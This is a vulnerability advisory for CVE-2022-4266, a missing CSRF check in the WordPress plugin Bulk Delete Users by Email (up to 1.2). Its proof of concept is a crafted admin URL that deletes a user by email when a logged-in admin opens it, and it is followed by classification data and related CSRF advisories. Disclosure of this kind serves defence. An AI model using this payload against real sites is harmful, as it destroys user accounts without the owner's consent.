Bulk Delete Users by Email <= 1.2 – User Deletion via CSRF | CVE 2022-4266 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when deleting users, which could allow attackers to make a logged in admin delete non admin users by knowing their email via a CSRF attack

Proof of Concept

Make a logged in admin open the below URL to delete the user with the user@domain.com address

https://example.com/wp-admin/admin.php?page=bulk-delete-users-by-email%2Fplugin.php&de-text=user@domain.com

Affects Plugins

bulk-delete-users-by-email

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

1bcda9d3-c573-441e-828f-055fbec2e08d

Timeline

Publicly Published

2022-12-02 (about 1 years ago)

Added

2022-12-02 (about 1 years ago)

Last Updated

2022-12-02 (about 1 years ago)

Other

Published

Title

Published

2024-04-19

Title

Regenerate post permalink <= 1.0.3 - Cross-Site Request Forgery

Published

2022-02-10

Title

Spiffy Calendar < 4.9.1 - Arbitrary Event Deletion via CSRF

Published

2022-05-04

Title

Code Snippets Extended <= 1.4.7 - RCE via CSRF

Published

2023-02-21

Title

Educare - Students & Result Management System < 1.4.4 - Cross-Site Request Forgery (CSRF)

Published

2024-02-22

Title

Colibri Page Builder < 1.0.260 - Arbitrary Shortcode Call via CSRF